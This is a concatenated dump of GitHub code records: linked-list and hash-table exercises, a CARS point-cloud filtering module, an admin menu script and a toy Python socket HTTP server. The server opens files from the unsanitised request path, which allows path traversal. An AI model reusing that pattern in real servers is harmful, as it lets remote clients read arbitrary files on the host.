#ll.insert_at_begin(6)\n #ll.insert_End(1)\n #ll.insert_End(2)\n ll.insert_values([\"a\",\"b\",\"c\"])\n #ll.remove_at(2)\n ll.insert_at(0,\"e\")\n ll.print()\n ll.insert_at(2,\"f\")\n\n ll.print()\n print(\"lenght:\",ll.get_length())\n\n\n\n","repo_name":"Tarunvamsi/DataStructuresImplementations","sub_path":"LinkedLists.py","file_name":"LinkedLists.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3364639933","text":"import logging\nfrom typing import List, Tuple, Union\n\n# Third party imports\nimport numpy as np\nimport pandas\nimport xarray as xr\nfrom scipy.spatial import cKDTree # pylint: disable=no-name-in-module\n\n# CARS imports\nfrom cars.core import constants as cst\nfrom cars.core import projection\n\n\ndef create_combined_cloud( # noqa: C901\n cloud_list: List[xr.Dataset],\n dsm_epsg: int,\n color_list: List[xr.Dataset] = None,\n resolution: float = None,\n xstart: float = None,\n ystart: float = None,\n xsize: int = None,\n ysize: int = None,\n on_ground_margin: int = 0,\n epipolar_border_margin: int = 0,\n radius: float = 1,\n with_coords: bool = False,\n) -> Tuple[pandas.DataFrame, int]:\n \"\"\"\n Combine a list of clouds (and their colors) into a pandas dataframe\n structured with the following labels:\n\n * if no colors in input and no mask data present in cloud_list datasets:\n >>> labels=[cst.POINTS_CLOUD_VALID_DATA, cst.X, cst.Y, cst.Z]\n\n The combined cloud has x, y, z columns along with 'valid data' one.\n The valid data is a mask set to True if the data\n are not on the epipolar image margin (epipolar_border_margin),\n otherwise it is set to False.\n\n * if no colors in input and mask data present in cloud_list datasets:\n >>> labels=[cst.POINTS_CLOUD_VALID_DATA,\n >>> cst.X, cst.Y, cst.Z, cst.POINTS_CLOUD_MSK]\n\n The mask values are added to the dataframe.\n\n * if colors are set in input and mask data are present\n in the cloud_list datasets:\n >>> labels=[cst.POINTS_CLOUD_VALID_DATA,\n >>> cst.X, cst.Y, cst.Z, cst.POINTS_CLOUD_MSK,\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"0\",\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"1\",\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"2\"]\n\n Color channels information are added to the dataframe.\n\n * if colors in input, mask data present in the cloud_list datasets and\n the with_coords option is activated:\n >>> labels=[cst.POINTS_CLOUD_VALID_DATA,\n >>> cst.X, cst.Y, cst.Z, cst.POINTS_CLOUD_MSK,\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"0\",\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"1\",\n >>> cst.POINTS_CLOUD_CLR_KEY_ROOT+\"2\"\n >>> cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n >>> cst.POINTS_CLOUD_COORD_EPI_GEOM_J,\n >>> cst.POINTS_CLOUD_IDX_IM_EPI]\n\n The pixel position of the xyz point in the original epipolar\n image (coord_epi_geom_i, coord_epi_geom_j) are added\n to the dataframe along with the index of its original cloud\n in the cloud_list input.\n\n :raise Exception: if a color_list is set\n but does not have the same length as the cloud list\n\n :param cloud_list: list of cloud points to rasterize\n :param dsm_epsg: epsg code for the CRS of the final output raster\n :param color_list: Additional list of images\n with bands to rasterize (same size as cloud_list), or None\n :param resolution: Resolution of rasterized cells, in cloud CRS units\n (if None, the whole clouds are combined)\n :param xstart: xstart of the rasterization grid\n (if None, the whole clouds are combined)\n :param ystart: ystart of the rasterization grid\n (if None, the whole clouds are combined)\n :param xsize: xsize of the rasterization grid\n (if None, the whole clouds are combined)\n :param ysize: ysize of the rasterization grid\n (if None, the whole clouds are combined)\n :param on_ground_margin: Margin added to the rasterization grid\n (default value: 0)\n :param epipolar_border_margin: Margin used\n to invalidate cells too close to epipolar border. (default value: 0)\n :param radius: Radius for hole filling\n (if None, the whole clouds are combined).\n :param with_coords: Option enabling the adding to the combined cloud\n of information of each point to retrieve their positions\n in the original epipolar images\n :return: Tuple formed with the combined clouds and color\n in a single pandas dataframe and the epsg code\n \"\"\"\n worker_logger = logging.getLogger(\"distributed.worker\")\n\n # check input data consistency\n if color_list is not None and len(cloud_list) != len(color_list):\n raise Exception(\"There shall be as many cloud elements as color ones\")\n\n epsg = None\n for cloud_list_item in cloud_list:\n if epsg is None:\n epsg = int(cloud_list_item.attrs[cst.EPSG])\n elif int(cloud_list_item.attrs[cst.EPSG]) != epsg:\n worker_logger.error(\n \"All points clouds do not have the same epsg code\"\n )\n\n # compute margin/roi and final number of data to add to the combined cloud\n roi = (\n resolution is not None\n and xstart is not None\n and ystart is not None\n and xsize is not None\n and ysize is not None\n )\n if roi:\n total_margin = (on_ground_margin + radius + 1) * resolution\n xend = xstart + (xsize + 1) * resolution\n yend = ystart - (ysize + 1) * resolution\n\n nb_data = [cst.POINTS_CLOUD_VALID_DATA, cst.X, cst.Y, cst.Z]\n\n # check if the input mask values are present in the dataset\n nb_data_msk = 0\n for cloud_list_item in cloud_list:\n ds_values_list = [key for key, _ in cloud_list_item.items()]\n if cst.POINTS_CLOUD_MSK in ds_values_list:\n nb_data.append(cst.POINTS_CLOUD_MSK)\n nb_data_msk = 1\n break\n\n if color_list is not None:\n clr_im = color_list[0].im.values\n nb_band_clr = clr_im.shape[0]\n list_clr = [\n \"{}{}\".format(cst.POINTS_CLOUD_CLR_KEY_ROOT, i)\n for i in range(nb_band_clr)\n ]\n nb_data.extend(list_clr)\n else:\n nb_band_clr = 0\n\n if with_coords:\n nb_data.extend(\n [\n cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n cst.POINTS_CLOUD_COORD_EPI_GEOM_J,\n cst.POINTS_CLOUD_IDX_IM_EPI,\n ]\n )\n\n # iterate trough input clouds\n cloud = np.zeros((0, len(nb_data)), dtype=np.float64)\n nb_points = 0\n for cloud_list_idx, cloud_list_item in enumerate(cloud_list):\n full_x = cloud_list_item[cst.X].values\n full_y = cloud_list_item[cst.Y].values\n full_z = cloud_list_item[cst.Z].values\n\n # get mask of points inside the roi (plus margins)\n if roi:\n\n # if the points clouds are not in the same referential as the roi,\n # it is converted using the dsm_epsg\n if epsg != dsm_epsg:\n (\n full_x,\n full_y,\n ) = projection.get_converted_xy_np_arrays_from_dataset(\n cloud_list_item, dsm_epsg\n )\n\n msk_xstart = np.where(full_x > xstart - total_margin, True, False)\n msk_xend = np.where(full_x < xend + total_margin, True, False)\n msk_yend = np.where(full_y > yend - total_margin, True, False)\n msk_ystart = np.where(full_y < ystart + total_margin, True, False)\n terrain_tile_data_msk = np.logical_and(\n msk_xstart,\n np.logical_and(msk_xend, np.logical_and(msk_ystart, msk_yend)),\n )\n terrain_tile_data_msk_pos = terrain_tile_data_msk.astype(\n np.int8\n ).nonzero()\n\n # if the points clouds are not in the same referential as the roi,\n # retrieve the initial values\n if epsg != dsm_epsg:\n full_x = cloud_list_item[cst.X].values\n full_y = cloud_list_item[cst.Y].values\n\n # if no point is found, continue\n if terrain_tile_data_msk_pos[0].shape[0] == 0:\n continue\n\n # get useful data bounding box\n bbox = [\n np.min(terrain_tile_data_msk_pos[0]),\n np.min(terrain_tile_data_msk_pos[1]),\n np.max(terrain_tile_data_msk_pos[0]),\n np.max(terrain_tile_data_msk_pos[1]),\n ]\n else:\n bbox = [0, 0, full_y.shape[0] - 1, full_y.shape[1] - 1]\n\n # add (x, y, z) information to the current cloud\n c_x = full_x[bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1]\n c_y = full_y[bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1]\n c_z = full_z[bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1]\n\n c_cloud = np.zeros(\n (len(nb_data), (bbox[2] - bbox[0] + 1) * (bbox[3] - bbox[1] + 1))\n )\n c_cloud[1, :] = np.ravel(c_x)\n c_cloud[2, :] = np.ravel(c_y)\n c_cloud[3, :] = np.ravel(c_z)\n\n ds_values_list = [key for key, _ in cloud_list_item.items()]\n\n if cst.POINTS_CLOUD_MSK in ds_values_list:\n c_msk = cloud_list_item[cst.POINTS_CLOUD_MSK].values[\n bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ]\n c_cloud[4, :] = np.ravel(c_msk)\n\n # add data valid mask\n # (points that are not in the border of the epipolar image)\n if epipolar_border_margin == 0:\n epipolar_margin_mask = np.full(\n (\n cloud_list_item[cst.X].values.shape[0],\n cloud_list_item[cst.X].values.shape[1],\n ),\n True,\n )\n else:\n epipolar_margin_mask = np.full(\n (\n cloud_list_item[cst.X].values.shape[0],\n cloud_list_item[cst.X].values.shape[1],\n ),\n False,\n )\n epipolar_margin_mask[\n epipolar_border_margin:-epipolar_border_margin,\n epipolar_border_margin:-epipolar_border_margin,\n ] = True\n\n c_epipolar_margin_mask = epipolar_margin_mask[\n bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ]\n c_cloud[0, :] = np.ravel(c_epipolar_margin_mask)\n\n # add the color information to the current cloud\n if color_list is not None:\n c_color = color_list[cloud_list_idx].im.values[\n :, bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ]\n\n for band in range(nb_band_clr):\n c_cloud[4 + nb_data_msk + band, :] = np.ravel(\n c_color[band, :, :]\n )\n\n # add the original image coordinates information to the current cloud\n if with_coords:\n coords_line = np.linspace(bbox[0], bbox[2], bbox[2] - bbox[0] + 1)\n coords_col = np.linspace(bbox[1], bbox[3], bbox[3] - bbox[1] + 1)\n coords_col, coords_line = np.meshgrid(coords_col, coords_line)\n\n c_cloud[4 + nb_data_msk + nb_band_clr, :] = np.ravel(coords_line)\n c_cloud[4 + nb_data_msk + nb_band_clr + 1, :] = np.ravel(coords_col)\n c_cloud[4 + nb_data_msk + nb_band_clr + 2, :] = cloud_list_idx\n\n # remove masked data (pandora + out of the terrain tile points)\n c_terrain_tile_data_msk = (\n cloud_list_item[cst.POINTS_CLOUD_CORR_MSK].values[\n bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ]\n == 255\n )\n\n if roi:\n c_terrain_tile_data_msk = np.logical_and(\n c_terrain_tile_data_msk,\n terrain_tile_data_msk[\n bbox[0] : bbox[2] + 1, bbox[1] : bbox[3] + 1\n ],\n )\n\n c_terrain_tile_data_msk = np.ravel(c_terrain_tile_data_msk)\n\n c_terrain_tile_data_msk_pos = np.nonzero(~c_terrain_tile_data_msk)\n\n nb_points += c_cloud.shape[1]\n\n c_cloud = np.delete(\n c_cloud.transpose(), c_terrain_tile_data_msk_pos[0], 0\n )\n\n # add current cloud to the combined one\n cloud = np.concatenate([cloud, c_cloud], axis=0)\n\n worker_logger.debug(\"Received {} points to rasterize\".format(nb_points))\n worker_logger.debug(\n \"Keeping {}/{} points \"\n \"inside rasterization grid\".format(cloud.shape[0], nb_points)\n )\n\n pd_cloud = pandas.DataFrame(cloud, columns=nb_data)\n\n return pd_cloud, epsg\n\n\n# ##### Small components filtering ######\n\n\ndef small_components_filtering(\n cloud: pandas.DataFrame,\n connection_val: float,\n nb_pts_threshold: int,\n clusters_distance_threshold: float = None,\n filtered_elt_pos: bool = False,\n) -> Tuple[pandas.DataFrame, Union[None, pandas.DataFrame]]:\n \"\"\"\n Filter points cloud to remove small clusters of points\n (see the detect_small_components function).\n\n :param cloud: combined cloud\n as returned by the create_combined_cloud function\n :param connection_val: distance to use\n to consider that two points are connected\n :param nb_pts_threshold: number of points to use\n to identify small clusters to filter\n :param clusters_distance_threshold: distance to use\n to consider if two points clusters are far from each other or not\n (set to None to deactivate this level of filtering)\n :param filtered_elt_pos: if filtered_elt_pos is set to True,\n the removed points positions in their original\n epipolar images are returned, otherwise it is set to None\n :return: Tuple made of the filtered cloud and\n the removed elements positions in their epipolar images\n \"\"\"\n cloud_xyz = cloud.loc[:, [cst.X, cst.Y, cst.Z]].values\n index_elt_to_remove = detect_small_components(\n cloud_xyz, connection_val, nb_pts_threshold, clusters_distance_threshold\n )\n\n return filter_cloud(cloud, index_elt_to_remove, filtered_elt_pos)\n\n\ndef detect_small_components(\n cloud_xyz: np.ndarray,\n connection_val: float,\n nb_pts_threshold: int,\n clusters_distance_threshold: float = None,\n) -> List[int]:\n \"\"\"\n Determine the indexes of the points of cloud_xyz to filter.\n The clusters are made of 'connected' points\n (2 connected points have a distance smaller than connection_val)\n\n The removed clusters are composed of less than nb_pts_threshold points and\n are also far from other clusters\n (points are further than clusters_distance_threshold).\n\n If clusters_distance_threshold is set to None, all the clusters that are\n composed of less than nb_pts_threshold points are filtered.\n\n :param cloud_xyz: points kdTree\n :param connection_val: distance to use\n to consider that two points are connected\n :param nb_pts_threshold: number of points to use\n to identify small clusters to filter\n :param clusters_distance_threshold: distance to use\n to consider if two points clusters are far from each other or not\n (set to None to deactivate this level of filtering)\n :return: list of the points to filter indexes\n \"\"\"\n cloud_tree = cKDTree(cloud_xyz)\n\n # extract connected components\n processed = [False] * len(cloud_xyz)\n connected_components = []\n for idx, _ in enumerate(cloud_xyz):\n\n # if point has already been added to a cluster\n if processed[idx]:\n continue\n\n # get point neighbors\n neighbors_list = cloud_tree.query_ball_point(\n cloud_xyz[idx], connection_val\n )\n\n # add them to the current cluster\n seed = []\n seed.extend(neighbors_list)\n for neigh_idx in neighbors_list:\n processed[neigh_idx] = True\n\n # iteratively add all the neighbors of the points\n # which were added to the current cluster (if there are some)\n while len(neighbors_list) != 0:\n all_neighbors = cloud_tree.query_ball_point(\n cloud_xyz[neighbors_list], connection_val\n )\n\n # flatten neighbors\n new_neighbors = []\n for neighbor_item in all_neighbors:\n new_neighbors.extend(neighbor_item)\n\n # retrieve only new neighbors\n neighbors_list = list(set(new_neighbors) - set(seed))\n\n # add them to the current cluster\n seed.extend(neighbors_list)\n for neigh_idx in neighbors_list:\n processed[neigh_idx] = True\n\n connected_components.append(seed)\n\n # determine clusters to remove\n cluster_to_remove = []\n for connected_components_idx, connected_components_item in enumerate(\n connected_components\n ):\n if len(connected_components_item) < nb_pts_threshold:\n if clusters_distance_threshold is not None:\n # search if the current cluster has any neighbors\n # in the clusters_distance_threshold radius\n all_neighbors = cloud_tree.query_ball_point(\n cloud_xyz[connected_components[connected_components_idx]],\n clusters_distance_threshold,\n )\n\n # flatten neighbors\n new_neighbors = []\n for neighbor_item in all_neighbors:\n new_neighbors.extend(neighbor_item)\n\n # retrieve only new neighbors\n neighbors_list = list(\n set(new_neighbors) - set(connected_components_item)\n )\n\n # if there are no new neighbors, the cluster will be removed\n if len(neighbors_list) == 0:\n cluster_to_remove.extend(connected_components_item)\n else:\n cluster_to_remove.extend(connected_components_item)\n\n return cluster_to_remove\n\n\n# ##### statistical filtering ######\n\n\ndef statistical_outliers_filtering(\n cloud: pandas.DataFrame,\n k: int,\n std_factor: float,\n filtered_elt_pos: bool = False,\n) -> Tuple[pandas.DataFrame, Union[None, pandas.DataFrame]]:\n \"\"\"\n Filter points cloud to remove statistical outliers\n (see the detect_statistical_outliers function).\n\n :param cloud: combined cloud\n as returned by the create_combined_cloud function\n :param k: number of neighbors\n :param std_factor: multiplication factor to use\n to compute the distance threshold\n :param filtered_elt_pos: if filtered_elt_pos is set to True,\n the removed points positions in their original\n epipolar images are returned, otherwise it is set to None\n :return: Tuple made of the filtered cloud and\n the removed elements positions in their epipolar images\n \"\"\"\n cloud_xyz = cloud.loc[:, [cst.X, cst.Y, cst.Z]].values\n index_elt_to_remove = detect_statistical_outliers(cloud_xyz, k, std_factor)\n\n return filter_cloud(cloud, index_elt_to_remove, filtered_elt_pos)\n\n\ndef detect_statistical_outliers(\n cloud_xyz: np.ndarray, k: int, std_factor: float = 3.0\n) -> List[int]:\n \"\"\"\n Determine the indexes of the points of cloud_xyz to filter.\n The removed points have mean distances with their k nearest neighbors\n that are greater than a distance threshold (dist_thresh).\n\n This threshold is computed from the mean (mean_distances) and\n standard deviation (stddev_distances) of all the points mean distances\n with their k nearest neighbors:\n\n dist_thresh = mean_distances + std_factor * stddev_distances\n\n :param cloud_xyz: points kdTree\n :param k: number of neighbors\n :param std_factor: multiplication factor to use\n to compute the distance threshold\n :return: list of the points to filter indexes\n \"\"\"\n # compute for each points, all the distances to their k neighbors\n cloud_tree = cKDTree(cloud_xyz)\n neighbors_distances, _ = cloud_tree.query(cloud_xyz, k + 1)\n\n # Compute the mean of those distances for each point\n # Mean is not used directly as each line\n # contained the distance value to the point itself\n mean_neighbors_distances = np.sum(neighbors_distances, axis=1)\n mean_neighbors_distances /= k\n\n # compute mean and standard deviation of those mean distances\n # for the whole point cloud\n mean_distances = np.mean(mean_neighbors_distances)\n stddev_distances = np.std(mean_neighbors_distances)\n\n # compute distance threshold and\n # apply it to determine which points will be removed\n dist_thresh = mean_distances + std_factor * stddev_distances\n points_to_remove = np.argwhere(mean_neighbors_distances > dist_thresh)\n\n # flatten points_to_remove\n detected_points = []\n for removed_point in points_to_remove:\n detected_points.extend(removed_point)\n\n return detected_points\n\n\n# ##### common filtering tools ######\n\n\ndef filter_cloud(\n cloud: pandas.DataFrame,\n index_elt_to_remove: List[int],\n filtered_elt_pos: bool = False,\n) -> Tuple[pandas.DataFrame, Union[None, pandas.DataFrame]]:\n \"\"\"\n Filter all points of the cloud DataFrame\n which index is in the index_elt_to_remove list.\n\n If filtered_elt_pos is set to True, the information of the removed elements\n positions in their original epipolar images are returned.\n\n To do so the cloud DataFrame has to be build\n with the 'with_coords' option activated.\n\n :param cloud: combined cloud\n as returned by the create_combined_cloud function\n :param index_elt_to_remove: indexes of lines\n to filter in the cloud DataFrame\n :param filtered_elt_pos: if filtered_elt_pos is set to True,\n the removed points positions in their original epipolar images are\n returned, otherwise it is set to None\n :return: Tuple composed of the filtered cloud DataFrame and\n the filtered elements epipolar position information\n (or None for the latter if filtered_elt_pos is set to False\n or if the cloud Dataframe has not been build with with_coords option)\n \"\"\"\n if filtered_elt_pos and not (\n cst.POINTS_CLOUD_COORD_EPI_GEOM_I in cloud.columns\n and cst.POINTS_CLOUD_COORD_EPI_GEOM_J in cloud.columns\n and cst.POINTS_CLOUD_IDX_IM_EPI in cloud.columns\n ):\n worker_logger = logging.getLogger(\"distributed.worker\")\n worker_logger.warning(\n \"In filter_cloud: the filtered_elt_pos has been activated but \"\n \"the cloud Datafram has not been build with option with_coords. \"\n \"The positions cannot be retrieved.\"\n )\n filtered_elt_pos = False\n\n # retrieve removed points position in their original epipolar images\n if filtered_elt_pos:\n labels = [\n cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n cst.POINTS_CLOUD_COORD_EPI_GEOM_J,\n cst.POINTS_CLOUD_IDX_IM_EPI,\n ]\n\n removed_elt_pos_infos = cloud.loc[\n cloud.index.values[index_elt_to_remove], labels\n ].values\n\n removed_elt_pos_infos = pandas.DataFrame(\n removed_elt_pos_infos, columns=labels\n )\n else:\n removed_elt_pos_infos = None\n\n # remove points from the cloud\n cloud = cloud.drop(index=cloud.index.values[index_elt_to_remove])\n\n return cloud, removed_elt_pos_infos\n\n\ndef add_cloud_filtering_msk(\n clouds_list: List[xr.Dataset],\n elt_pos_infos: pandas.DataFrame,\n mask_label: str,\n mask_value: int = 255,\n):\n \"\"\"\n Add a uint16 mask labeled 'mask_label' to the clouds in clouds_list.\n (in-line function)\n\n :param clouds_list: Input list of clouds\n :param elt_pos_infos: pandas dataframe\n composed of cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n cst.POINTS_CLOUD_COORD_EPI_GEOM_J, cst.POINTS_CLOUD_IDX_IM_EPI columns\n as computed in the create_combined_cloud function.\n Those information are used to retrieve the point position\n in its original epipolar image.\n :param mask_label: label to give to the mask in the datasets\n :param mask_value: filtered elements value in the mask\n \"\"\"\n\n # Verify that the elt_pos_infos is consistent\n if (\n elt_pos_infos is None\n or cst.POINTS_CLOUD_COORD_EPI_GEOM_I not in elt_pos_infos.columns\n or cst.POINTS_CLOUD_COORD_EPI_GEOM_J not in elt_pos_infos.columns\n or cst.POINTS_CLOUD_IDX_IM_EPI not in elt_pos_infos.columns\n ):\n worker_logger = logging.getLogger(\"distributed.worker\")\n worker_logger.warning(\n \"Cannot generate filtered elements mask, \"\n \"no information about the point's\"\n \" original position in the epipolar image is given\"\n )\n\n else:\n elt_index = elt_pos_infos.loc[:, cst.POINTS_CLOUD_IDX_IM_EPI].to_numpy()\n\n min_elt_index = np.min(elt_index)\n max_elt_index = np.max(elt_index)\n\n if min_elt_index < 0 or max_elt_index > len(clouds_list) - 1:\n raise Exception(\n \"Index indicated in the elt_pos_infos pandas. \"\n \"DataFrame is not coherent with the clouds list given in input\"\n )\n\n # create and add mask to each element of clouds_list\n for cloud_idx, cloud_item in enumerate(clouds_list):\n if mask_label not in cloud_item:\n nb_row = cloud_item.coords[cst.ROW].data.shape[0]\n nb_col = cloud_item.coords[cst.COL].data.shape[0]\n msk = np.zeros((nb_row, nb_col), dtype=np.uint16)\n else:\n msk = cloud_item[mask_label].values\n\n cur_elt_index = np.argwhere(elt_index == cloud_idx)\n\n for elt_pos in range(cur_elt_index.shape[0]):\n i = int(\n elt_pos_infos.loc[\n cur_elt_index[elt_pos],\n cst.POINTS_CLOUD_COORD_EPI_GEOM_I,\n ].iat[0]\n )\n j = int(\n elt_pos_infos.loc[\n cur_elt_index[elt_pos],\n cst.POINTS_CLOUD_COORD_EPI_GEOM_J,\n ].iat[0]\n )\n\n try:\n msk[i, j] = mask_value\n except Exception as index_error:\n raise Exception(\n \"Point at location ({},{}) is not accessible \"\n \"in an image of size ({},{})\".format(\n i, j, msk.shape[0], msk.shape[1]\n )\n ) from index_error\n\n cloud_item[mask_label] = ([cst.ROW, cst.COL], msk)\n","repo_name":"KalipheGTU/cars","sub_path":"cars/steps/points_cloud.py","file_name":"points_cloud.py","file_ext":"py","file_size_in_byte":26330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"37038934123","text":"#! /usr/bin/env python3\r\n\r\n# Script to administrate RFAI database\r\n# last revision: Sep 2016, Michael Fruhnert\r\n\r\n## INSTRUCTIONS:\r\n## 1) use along with rfai.py and rfaitoolbox.py\r\n##\r\n## Path to Modify category: modify question - modify category\r\n\r\n#import all necessary libraries\r\nfrom openpyxl import load_workbook\r\nfrom os import system\r\nfrom rfaitoolbox import selectQuestionMaster, rearrangeCategories\r\nfrom rfaitoolbox import replaceQuestion, collectRFAI, normalizeMaster\r\nfrom rfaitoolbox import findRFAIFolder\r\nimport basicUtils as basics\r\n\r\ndoMore = True\r\nsystem('clear')\r\nrfaiFolder = findRFAIFolder(True) # assume that we work one at a time\r\nif (rfaiFolder[0] != ''):\r\n print(rfaiFolder[1] + ' set as default.\\n')\r\n\r\nwhile(doMore):\r\n print('This is the RFAI administration tool. ' \\\r\n 'Use with extreme caution!\\n')\r\n\r\n doThis = input(\"Choose from options below:\\n\"\\\r\n \"c: re-arrange categories\\n\" \\\r\n \"q: modify questions / answers\\n\" \\\r\n \"n: normalize master (ASCII conformity)\\n\" \\\r\n \"r: replace question (mark for deletion)\\n\" \\\r\n \"w: collect files and write responses\\n\" \\\r\n \"0: exit\\n\" \\\r\n \"\\n\")\r\n \r\n system('clear')\r\n if (doThis == 'c'):\r\n rearrangeCategories()\r\n elif (doThis == 'q'):\r\n selectQuestionMaster()\r\n elif (doThis == 'n'):\r\n normalizeMaster()\r\n elif (doThis == 'r'):\r\n replaceQuestion(rfaiFolder[0])\r\n elif (doThis == 'w'):\r\n collectRFAI(rfaiFolder[0])\r\n elif (doThis == '0'):\r\n print(\"RFAI administration tool shut-down...\\n\")\r\n doMore = False\r\n else:\r\n print(\"Invalid input. Enter 0 to exit.\\n\")\r\n","repo_name":"pickles72/RFAI","sub_path":"rfaiAdmin.py","file_name":"rfaiAdmin.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1929137473","text":"import pandas as pd\n\n# Read Excel file\ndf = pd.read_excel('./LabelledData_2/3.xlsx') # Set 2 Mike\n#df = pd.read_table('./LabelledData_3/4.xlsx') # Set 3 Joe\n\n\n# Print the first row\nfirst_row = df.head(n=1)\nprint(df)\n","repo_name":"tylermante10/NAIIDS","sub_path":"test-files/readCSVTest.py","file_name":"readCSVTest.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22023698400","text":"import socket\n\ndef start_my_server():\n try: #Обработчик исключений\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server.bind(('127.0.0.1', 2000)) #Назвначаем адресс для серверного соккета\n\n server.listen(4) #Кол-во входящих запросов\n while True: #Бесконечный цикл обработки запросов\n print('Working...')\n client_socket, address = server.accept()\n data = client_socket.recv(1024).decode('utf-8') #Представляем информацию в читабильном виде\n #print(data)\n content = load_page_from_get_request(data) #Ответ клиенту\n client_socket.send(content) #Енкодируем заголовки\n client_socket.shutdown(socket.SHUT_WR) #Закрывает соединение с клиентом\n except KeyboardInterrupt:\n server.close()\n print('Shutdown this shit...')\n\ndef load_page_from_get_request(request_data): # Передаем запрос клиента\n HDRS = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n' #Тип ответа, статус, код статуса, кодировка\n HDRS_404 = 'HTTP/1.1 404 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n'\n path = request_data.split(' ')[1] #Распарсим функцией split\n response = ''\n try:\n with open('views' + path, 'rb') as file: #Вычитываем его содержимое сразу в байтовом представлении\n response = file.read()\n return HDRS.encode('utf-8') + response\n except FileNotFoundError:\n return (HDRS_404 + 'Sorry, but there is no page..').encode('utf-8') #Не может открыть файл, потому что его нет\n\nif __name__ == '__main__': #Ger\n start_my_server()\n\n","repo_name":"Vdmitrofanova/Universe","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30236631594","text":"import unittest\n\n\nclass HashItem(object):\n def __init__(self, key, value):\n self.key = key\n self.value = value\n\n def __repr__(self):\n return f\"{self.key}: {self.value}\"\n\n\nclass HashTable(object):\n \"\"\"Implementation of a HashTable using chaining; that means that in each\n array slot there is a list.\n \"\"\"\n\n SIZE = 1024\n\n def __init__(self):\n self._slots = [list() for _ in range(self.SIZE)]\n\n def __getitem__(self, key):\n return self.get(key)\n\n def __setitem__(self, key, value):\n self.set(key, value)\n\n @classmethod\n def _hash(cls, key):\n \"\"\"Hashing of the key. I decided to use the builtin hash function.\n I don't think I could think about something smarter and more efficient\n (in a general case) than C-implemented hashing function.\n\n To make sure that we end up with a value within our _slots size I added\n modulo `self.SIZE`.\n\n \"\"\"\n return hash(key) % cls.SIZE\n\n def set(self, key, value):\n \"\"\"Sets the key with value. If key already exists in dict it item is\n updated otherwise added.\n\n :param key: key\n :type key: object\n :param value: value\n :type value: object\n\n :Example:\n >>> hash_table = HashTable()\n >>> hash_table.set(\"It's dangerous to go alone...\", \"Take this!\")\n >>> # The same functionality can be implemented with brackets:\n >>> # hash_table[\"It's dangerous to go alone...\"] = \"Take this!\"\n >>> hash_table[\"It's dangerous to go alone...\"]\n \"Take this!\"\n \"\"\"\n new_item = HashItem(key, value)\n index = self._hash(key)\n for iter_item in self._slots[index]:\n if iter_item.key == key:\n iter_item.value = value\n return\n self._slots[index].append(new_item)\n\n def get(self, key):\n \"\"\"Gets the value of element saved with key.\n If key is not in the HashTable raises KeyError.\n\n :param key: key\n :type key: object\n :return: value\n :rtype: object\n :raises: KeyError\n\n :Example:\n >>> hash_table = HashTable()\n >>> hash_table[\"It's dangerous to go alone...\"] = \"Take this!\"\n >>> hash_table.get(\"It's dangerous to go alone...\")\n >>> # The same functionality can be implemented with brackets:\n >>> # hash_table[\"It's dangerous to go alone...\"]\n \"Take this!\"\n \"\"\"\n index = self._hash(key)\n for iter_item in self._slots[index]:\n if iter_item.key == key:\n return iter_item.value\n raise KeyError(f\"{key} is not in the hash table.\")\n\n\nclass TestHashTable(unittest.TestCase):\n def test_init(self):\n hash_table = HashTable()\n self.assertListEqual([list()] * 1024, hash_table._slots)\n\n def test_hash(self):\n \"\"\"I am not going to test builtin hash function. Just make sure it\n never exceeds `self.SIZE`.\n \"\"\"\n test_input = [1, 2, 1023, 1024, 231312]\n expected = [1, 2, 1023, 0, 912]\n actual = [HashTable._hash(i) for i in test_input]\n for e, a in zip(expected, actual):\n with self.subTest(e=e, a=a):\n self.assertEqual(e, a)\n\n def test_put_one_element(self):\n hash_table = HashTable()\n hash_table.set(1, 'xyz')\n self.assertEqual(hash_table._slots[1][0].value, 'xyz')\n\n def test_put_update_element(self):\n hash_table = HashTable()\n hash_table.set(1, 'xyz')\n hash_table.set(1, 'abc')\n with self.subTest():\n self.assertEqual('abc', hash_table._slots[1][0].value)\n with self.subTest():\n self.assertEqual(1, len(hash_table._slots[1]))\n\n def test_put_multiple_elements(self):\n hash_table = HashTable()\n hash_table.set(1, 'xyz')\n hash_table.set(1025, 'abc')\n hash_table.set(2049, 'lol')\n actual = hash_table._slots[1]\n for e, a in zip(['xyz', 'abc', 'lol'], actual):\n with self.subTest(e=e, a=a.value):\n self.assertEqual(e, a.value)\n actual_len = len(hash_table._slots[1])\n expected_len = 3\n with self.subTest(e=expected_len, a=actual_len):\n self.assertEqual(expected_len, actual_len)\n\n def test_get_raises(self):\n hash_table = HashTable()\n with self.assertRaises(KeyError):\n _ = hash_table.get('xyz')\n\n def test_get_one_elem_in_slot(self):\n hash_table = HashTable()\n hash_table.set(1025, 'abc')\n self.assertEqual('abc', hash_table.get(1025))\n\n def 